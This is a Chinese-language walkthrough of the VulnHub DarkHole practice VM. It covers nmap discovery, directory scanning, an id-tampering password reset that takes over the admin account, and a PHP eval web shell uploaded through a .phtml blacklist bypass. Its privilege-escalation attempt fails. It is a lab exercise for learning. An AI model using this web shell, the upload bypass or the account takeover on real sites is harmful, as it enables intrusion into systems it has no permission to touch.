下载链接:
https://download.vulnhub.com/darkhole/DarkHole.zip
下载完成:
解压:
环境搭建
在虚拟机导航栏–》右键点击打开–》选择刚才解压后的文件–》打开
搭建完成:
信息收集
靶机搭建好了,现在什么都不知道,我们应该先找到该靶机的ip地址(类似真实攻防,你总的有个目标)
收集靶机网络模式与MAC地址
1.在虚拟机中,点击靶机右键设置
2.查看网络适配器,查看该靶机的网络模式,记住下一步要用
3.点击高级,查看该靶机的MAC地址,一样的记住下二步要用
(截图敲错字了,NAT)
查看NAT网络模式分配的ip地址段
虚拟机导航栏–》编辑–》虚拟网络编辑器–》更改设置
选择NAT模式–》然后就可以看见该模式下分配的ip地址段,靶机也是该模式,所以靶机的地址就是该地址段中的一个
打开kali扫描主机
点击kali右键设置–》点击网络配置器–》切换为NAT模式–》点击确定
查看kali在NAT模式下分配的地址
nmap扫描NAT模式下,该网段的存活主机
扫描结果肯定不止一个
利用之前查看的靶机MAC地址,做对比找出靶机ip
nmap 192.168.3.0/24 //扫描网段
kali扫描端口
知道了ip,不知道靶机开放了什么服务
所以扫描端口
nmap 192.168.3.131 -p- //扫描全端口
浏览访问
正常页面
showtime
kali目录扫描
dirsearch -u "http://192.168.3.131/"
拼接路径访问查看相关页面
应该是个文件上传后的功能点
禁止访问,太妙了
点了没啥反应
js文件(应该属于敏感信息泄露吧?看过了,没啥东西)
登录注册框
上传图片的
利用登录框
尝试弱口令登录
登录失败
注册账号
注册时可以尝试注册admin账号,提示用户已注册,代表该网站中存在admin用户
另注册一个账号,登录
只有一个修改密码的功能,抓包测试逻辑漏洞,看是否可以修改admin的密码
逻辑漏洞修改密码
发送到repeater模块,修改id值发包
退出登录,切换admin用户,登录后台
登录后台,多一个文件上传功能
文件上传getshell
直接上传php一句话文件
<?php @eval($_POST['cmd']); ?>
没成功,有格式限制
通过测试找到了黑名单的漏网之鱼.phtml后缀并没有进行限制
判断黑白名单成功getshell
文件后缀有限制,文件名后缀写一个完全不存在的后缀名,如果是黑名单,就可以上传成功,如果是白名单,就无法上传.
找文件上传漏洞时,一般都是找黑名单的
提示上传成功,点击file访问上传的的文件,复制链接,蚁剑连接
添加该数据–》右键虚拟终端
提权
现在用户是www-data接下来要做的就是提权到root
查看敏感文件找到存在可以提权的用户
cat /etc/passwd | grep /bin/bash
去john用户家目录看看能不能找到有用的信息
cd /home/join //进入用户家目录
ls -l //查看当前目录列表详细信息
没提权成功擦,你们看看大佬的
https://www.rstk.cn/news/1127100.html?action=onClick
https://blog.csdn.net/qq_18980147/article/details/127145582